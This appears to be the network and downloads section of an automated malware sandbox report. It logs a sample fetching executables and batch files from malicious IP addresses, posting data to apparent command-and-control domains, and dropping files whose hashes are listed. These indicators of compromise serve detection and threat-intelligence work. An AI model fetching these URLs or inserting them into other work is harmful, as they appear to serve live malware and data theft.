                    GET http://176.113.115.7/test/exe/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/test/am_no.bat

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/7001656225/Rm3cVPI.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/rast333a/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/7033027882/TbV75ZR.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/6691015685/hYjiwV0.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/8104437623/EPTwCQd.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/5163778194/7IIl2eE.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/1781548144/8BNn7ce.bat

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/teamex_support/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/luma/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/steam/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/well/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/off/random.exe

                    HTTP Response

                    200
                  • 176.113.115.7:80
                    http://176.113.115.7/files/unique2/random.exe
                    http
                    futors.exe
                    162.5kB
                    9.5MB
                    3518
                    6798

                    HTTP Request

                    GET http://176.113.115.7/files/martin2/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://176.113.115.7/files/unique2/random.exe

                    HTTP Response

                    200
                  • 176.113.115.7:80
                    http://176.113.115.7/mine/random.exe
                    http
                    powershell.exe
                    33.9kB
                    1.9MB
                    727
                    1374

                    HTTP Request

                    GET http://176.113.115.7/mine/random.exe

                    HTTP Response

                    200
                  • 176.113.115.7:80
                    http://176.113.115.7/mine/random.exe
                    http
                    powershell.exe
                    31.8kB
                    1.9MB
                    690
                    1374

                    HTTP Request

                    GET http://176.113.115.7/mine/random.exe

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    https://oreheatq.live/gsopp
                    tls, http
                    Rm3cVPI.exe
                    3.1kB
                    5.3kB
                    13
                    14

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    https://oreheatq.live/gsopp
                    tls, http
                    Rm3cVPI.exe
                    2.1kB
                    4.2kB
                    10
                    10

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    oreheatq.live
                    tls
                    Rm3cVPI.exe
                    1.1kB
                    4.2kB
                    9
                    9
                  • 185.156.73.98:80
                    http://185.156.73.98/success?substr=mixfour&s=three&sub=none
                    http
                    svchost015.exe
                    696 B
                    416 B
                    6
                    5

                    HTTP Request

                    GET http://185.156.73.98/success?substr=mixfour&s=three&sub=none

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/service
                    http
                    svchost015.exe
                    8.2kB
                    106.9kB
                    71
                    103

                    HTTP Request

                    GET http://185.156.73.98/info

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/update

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/service
                    http
                    svchost015.exe
                    8.6kB
                    107.0kB
                    71
                    104

                    HTTP Request

                    GET http://185.156.73.98/success?substr=mixthree&s=three&sub=none

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/info

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/update

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    Passwords.com
                    3.1kB
                    5.3kB
                    14
                    14

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    Passwords.com
                    2.1kB
                    3.7kB
                    10
                    10

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    Passwords.com
                    1.1kB
                    4.2kB
                    9
                    9

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    d744367ecb.exe
                    3.1kB
                    5.3kB
                    14
                    13

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    https://oreheatq.live/gsopp
                    tls, http
                    5cf0a9b56c.exe
                    3.1kB
                    4.7kB
                    14
                    12

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    d744367ecb.exe
                    2.1kB
                    4.2kB
                    10
                    10

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    https://oreheatq.live/gsopp
                    tls, http
                    5cf0a9b56c.exe
                    2.1kB
                    3.7kB
                    10
                    10

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200
                  • 172.67.172.183:443
                    https://oreheatq.live/gsopp
                    tls, http
                    5cf0a9b56c.exe
                    1.1kB
                    4.2kB
                    9
                    9

                    HTTP Request

                    POST https://oreheatq.live/gsopp

                    HTTP Response

                    200
                  • 104.21.25.9:443
                    https://advennture.top/GKsiio
                    tls, http
                    d744367ecb.exe
                    1.1kB
                    4.2kB
                    9
                    9

                    HTTP Request

                    POST https://advennture.top/GKsiio

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/ycl
                    http
                    svchost015.exe
                    77.5kB
                    3.4MB
                    1552
                    2469

                    HTTP Request

                    GET http://185.156.73.98/ycl

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/ycl

                    HTTP Response

                    200
                  • 45.93.20.28:80
                    http://45.93.20.28/85a1cacf11314eb8.php
                    http
                    57dbff855a.exe
                    720 B
                    625 B
                    5
                    5

                    HTTP Request

                    GET http://45.93.20.28/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://45.93.20.28/85a1cacf11314eb8.php

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/ycl
                    http
                    svchost015.exe
                    74.3kB
                    3.4MB
                    1546
                    2478

                    HTTP Request

                    GET http://185.156.73.98/ycl

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/ycl

                    HTTP Response

                    200
                  • 127.0.0.1:50269
                    firefox.exe
                  • 127.0.0.1:50275
                    firefox.exe
                  • 172.217.16.238:443
                    youtube.com
                    firefox.exe
                    52 B
                    1
                  • 172.217.16.238:443
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    tls, http2
                    firefox.exe
                    2.1kB
                    10.1kB
                    17
                    23

                    HTTP Request

                    GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                    HTTP Request

                    GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                  • 142.250.200.14:443
                    www.youtube.com
                    tls
                    firefox.exe
                    977 B
                    6.9kB
                    10
                    8
                  • 142.250.187.206:443
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    tls, http2
                    firefox.exe
                    3.2kB
                    75.7kB
                    39
                    65

                    HTTP Request

                    GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  • 34.120.5.221:443
                    https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    tls, http2
                    firefox.exe
                    1.7kB
                    12.7kB
                    12
                    18

                    HTTP Request

                    GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  • 142.250.180.4:443
                    https://www.google.com/favicon.ico
                    tls, http2
                    firefox.exe
                    1.8kB
                    7.5kB
                    15
                    17

                    HTTP Request

                    GET https://www.google.com/favicon.ico
                  • 185.156.73.98:80
                    http://185.156.73.98/success?substr=mixthree&s=three&sub=none
                    http
                    svchost015.exe
                    693 B
                    412 B
                    6
                    5

                    HTTP Request

                    GET http://185.156.73.98/success?substr=mixthree&s=three&sub=none

                    HTTP Response

                    200
                  • 107.174.192.179:80
                    http://107.174.192.179/app/u75a1_003.exe
                    http
                    rapes.exe
                    17.2kB
                    1.4MB
                    353
                    971

                    HTTP Request

                    GET http://107.174.192.179/app/u75a1_003.exe

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/success?substr=mixfour&s=three&sub=none
                    http
                    svchost015.exe
                    692 B
                    412 B
                    6
                    5

                    HTTP Request

                    GET http://185.156.73.98/success?substr=mixfour&s=three&sub=none

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/service
                    http
                    svchost015.exe
                    7.0kB
                    106.6kB
                    44
                    100

                    HTTP Request

                    GET http://185.156.73.98/info

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/update

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200
                  • 176.113.115.7:80
                    http://176.113.115.7/files/fate/random.exe
                    http
                    rapes.exe
                    19.4kB
                    1.2MB
                    377
                    855

                    HTTP Request

                    GET http://176.113.115.7/files/fate/random.exe

                    HTTP Response

                    200
                  • 185.156.73.98:80
                    http://185.156.73.98/service
                    http
                    svchost015.exe
                    7.8kB
                    106.6kB
                    66
                    99

                    HTTP Request

                    GET http://185.156.73.98/info

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/update

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.156.73.98/service

                    HTTP Response

                    200
                  • 172.217.169.46:443
                    https://play.google.com/log?hasfast=true&authuser=0&format=json
                    tls, http2
                    firefox.exe
                    2.6kB
                    8.6kB
                    15
                    19

                    HTTP Request

                    POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                  • 8.8.8.8:53
                    galarona.bet
                    dns
                    Rm3cVPI.exe
                    58 B
                    124 B
                    1
                    1

                    DNS Request

                    galarona.bet

                  • 8.8.8.8:53
                    oreheatq.live
                    dns
                    5cf0a9b56c.exe
                    59 B
                    91 B
                    1
                    1

                    DNS Request

                    oreheatq.live

                    DNS Response

                    172.67.172.183
                    104.21.30.96

                  • 8.8.8.8:53
                    TRnueDLgiwI.TRnueDLgiwI
                    dns
                    Passwords.com
                    69 B
                    144 B
                    1
                    1

                    DNS Request

                    TRnueDLgiwI.TRnueDLgiwI

                  • 8.8.8.8:53
                    advennture.top
                    dns
                    d744367ecb.exe
                    60 B
                    92 B
                    1
                    1

                    DNS Request

                    advennture.top

                    DNS Response

                    104.21.25.9
                    172.67.221.138

                  • 8.8.8.8:53
                    esccapewz.run
                    dns
                    d744367ecb.exe
                    118 B
                    127 B
                    2
                    1

                    DNS Request

                    esccapewz.run

                    DNS Request

                    esccapewz.run

                  • 8.8.8.8:53
                    travewlio.shop
                    dns
                    d744367ecb.exe
                    60 B
                    117 B
                    1
                    1

                    DNS Request

                    travewlio.shop

                  • 8.8.8.8:53
                    touvrlane.bet
                    dns
                    d744367ecb.exe
                    59 B
                    125 B
                    1
                    1

                    DNS Request

                    touvrlane.bet

                  • 8.8.8.8:53
                    wxayfarer.live
                    dns
                    5cf0a9b56c.exe
                    60 B
                    128 B
                    1
                    1

                    DNS Request

                    wxayfarer.live

                  • 8.8.8.8:53
                    sighbtseeing.shop
                    dns
                    d744367ecb.exe
                    63 B
                    120 B
                    1
                    1

                    DNS Request

                    sighbtseeing.shop

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    172.217.16.238

                  • 8.8.8.8:53
                    spocs.getpocket.com
                    dns
                    firefox.exe
                    65 B
                    131 B
                    1
                    1

                    DNS Request

                    spocs.getpocket.com

                    DNS Response

                    34.117.188.166

                  • 8.8.8.8:53
                    getpocket.cdn.mozilla.net
                    dns
                    firefox.exe
                    142 B
                    174 B
                    2
                    1

                    DNS Request

                    getpocket.cdn.mozilla.net

                    DNS Request

                    getpocket.cdn.mozilla.net

                    DNS Response

                    34.120.5.221

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    114 B
                    73 B
                    2
                    1

                    DNS Request

                    youtube.com

                    DNS Request

                    youtube.com

                    DNS Response

                    172.217.16.238

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    164 B
                    98 B
                    2
                    1

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.188.166

                  • 172.217.16.238:443
                    youtube.com
                    https
                    firefox.exe
                    3.3kB
                    9.3kB
                    8
                    10
                  • 8.8.8.8:53
                    www.youtube.com
                    dns
                    firefox.exe
                    61 B
                    319 B
                    1
                    1

                    DNS Request

                    www.youtube.com

                    DNS Response

                    142.250.200.14
                    142.250.178.14
                    172.217.169.78
                    142.250.187.206
                    216.58.212.206
                    216.58.204.78
                    216.58.212.238
                    216.58.201.110
                    172.217.169.14
                    172.217.16.238
                    142.250.187.238
                    142.250.179.238
                    142.250.200.46
                    142.250.180.14

                  • 142.250.200.14:443
                    www.youtube.com
                    https
                    firefox.exe
                    3.6kB
                    9.4kB
                    11
                    11
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.187.206

                  • 142.250.187.206:443
                    consent.youtube.com
                    https
                    firefox.exe
                    4.0kB
                    10.4kB
                    9
                    14
                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    85 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    2a00:1450:4009:821::200e

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    116 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                    DNS Response

                    44.240.131.83
                    54.213.200.248
                    44.227.3.195

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    153 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.149.100.209

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    122 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    2600:1901:0:c47c::

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    293 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    216.58.212.238
                    142.250.200.14
                    142.250.187.238
                    142.250.179.238
                    216.58.212.206
                    216.58.201.110
                    142.250.180.14
                    142.250.178.14
                    172.217.169.14
                    172.217.16.238
                    216.58.204.78
                    142.250.200.46
                    142.250.187.206
                    172.217.169.78

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.187.206

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    34.120.5.221

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    181 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    2a00:1450:4009:81d::200e
                    2a00:1450:4009:81e::200e
                    2a00:1450:4009:80b::200e
                    2a00:1450:4009:819::200e

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    2600:1901:0:524c::

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    2a00:1450:4009:81f::200e

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    119 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    34.160.144.191

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    131 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    2600:1901:0:92a9::

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.180.4

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.180.4

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    88 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    2a00:1450:4009:81e::2004

                  • 142.250.180.4:443
                    www.google.com
                    https
                    firefox.exe
                    3.4kB
                    9.3kB
                    10
                    10
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.187.206

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.187.206

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    172.217.169.46

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    172.217.169.46

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    89 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    2a00:1450:4009:818::200e

                  • 172.217.169.46:443
                    play.google.com
                    https
                    firefox.exe
                    3.1kB
                    9.3kB
                    6
                    10

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Temp\1CN4Qho3p.hta

                    Filesize

                    779B

                    MD5

                    39c8cd50176057af3728802964f92d49

                    SHA1

                    68fc10a10997d7ad00142fc0de393fe3500c8017

                    SHA256

                    f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                    SHA512

                    cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\soft[1]

                    Filesize

                    3.0MB

                    MD5

                    2cb4cdd698f1cbc9268d2c6bcd592077

                    SHA1

                    86e68f04bc99f21c9d6e32930c3709b371946165

                    SHA256

                    c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

                    SHA512

                    606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HIG00EVV\service[1].htm

                    Filesize

                    1B

                    MD5

                    cfcd208495d565ef66e7dff9f98764da

                    SHA1

                    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                    SHA256

                    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                    SHA512

                    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\t3xexgw3.default-release\activity-stream.discovery_stream.json.tmp

                    Filesize

                    23KB

                    MD5

                    f004ec6d3cfffeebbc7427df3deb4c3f

                    SHA1

                    ab7b03693b081880f95280dc30b634d57810aded

                    SHA256

                    c0263f1e149d48030cf01cf3a578d53f8c3fed2bb94c870d398ccfc08aeefa50

                    SHA512

                    afc93e175c1c6371fb278fb88381f5db0447ab64d4d293a62d5eeb6dc2a8fb8857a197030fdd0ce84022796d5626646808b26a8a60ca61c757eb5dd39bf1df94

                  • C:\Users\Admin\AppData\Local\TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE

                    Filesize

                    1.8MB

                    MD5

                    8b9c70f6c54237a5a7cad4b678701cc7

                    SHA1

                    651a499d3689c3a3eab98bbc71f61bdffd3d1916

                    SHA256

                    cca43069b3a39dc378a3b931a4ef2a9af6d181fad1cf3e40319d02fb3ca0b70c

                    SHA512

                    005bdf2dd1cc5655a7e9b76050e712d36c3d708648df2487b39491dc43b069862c68c0fc470badfcba87e483daf7a873c58d1751ffa30765bd2c61e8604952e0

                  • C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe

                    Filesize

                    4.4MB

                    MD5

                    7b6ba738a78a1b7b50fba7ab3968bd0f

                    SHA1

                    a2f0b69f915d18d9524d22e669171eb673450c82

                    SHA256

                    63e071fcb985ed0ff8f730869f7a27cff8b5c6b2b11aea44fcc030306ebaf963

                    SHA512

                    11545e7edbfb117a51a25b5520ad21b7091a07dab7200c12f7bcacb0afff60160ef9d0f4febbf62fa7919dcb3baecb58a387c818906bb6ac106e2504311bccb6

                  • C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe

                    Filesize

                    4.4MB

                    MD5

                    c8c02c1fa779a2319f82a1de600149f0

                    SHA1

                    42d1512e1ea6eead8cd0a11b7b1a200feb6e28b3

                    SHA256

                    2e9182478d0e659c8721bf2103897c496f23b49b4e701e9549b9ff0a84c4fa67

                    SHA512

                    63f68101bc1d4e5df3e748f6386d6dd2c0b743ecb8d9727c76b66e1cc2bd9c4366fadd184a4ca20222340c7de30724c87cd6b307b771521870c3c38ba24ee6e0

                  • C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe

                    Filesize

                    429KB

                    MD5

                    22892b8303fa56f4b584a04c09d508d8

                    SHA1

                    e1d65daaf338663006014f7d86eea5aebf142134

                    SHA256

                    87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

                    SHA512

                    852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

                  • C:\Users\Admin\AppData\Local\Temp\10369180101\6b651c8e26.exe

                    Filesize

                    938KB

                    MD5

                    bbde8b48c006c7a90e070bd05224e1f7

                    SHA1

                    e093c6731fc44fde99109fb056995bdd595456d6

                    SHA256

                    2f187acbe96a35cebb142a9f0ed2a3efe71cc9af120a58390902389146041412

                    SHA512

                    dff1ce0cca271c325b918d129c9bcadb705c410e727f258a3f9e68c4fa8a924ca2b4bd41b4359dde7bca0ef59f8903e43b7315f7a1ded938dd98d389fbdb93ed

                  • C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd

                    Filesize

                    1KB

                    MD5

                    cedac8d9ac1fbd8d4cfc76ebe20d37f9

                    SHA1

                    b0db8b540841091f32a91fd8b7abcd81d9632802

                    SHA256

                    5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                    SHA512

                    ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                  • C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe

                    Filesize

                    354KB

                    MD5

                    27f0df9e1937b002dbd367826c7cfeaf

                    SHA1

                    7d66f804665b531746d1a94314b8f78343e3eb4f

                    SHA256

                    aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                    SHA512

                    ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                  • C:\Users\Admin\AppData\Local\Temp\10369470101\e5466dd896.exe

                    Filesize

                    2.1MB

                    MD5

                    19e31a1b28028f14f86200065a2050af

                    SHA1

                    b41f9918bbc585b05b39f27a8609fa91608f6426

                    SHA256

                    122a70217bdaa237e87e735a099b5672f1f08f0ee3932e9f4df9f556c2dae746

                    SHA512

                    024a2ad1a7be46cd164956bb14e541e8677f0fda64f0a3d7b25773e6263a53a0492fb469d38e24f9ded36174a7c89f736bd0bd5b1c6bb701e5606d72fac02172

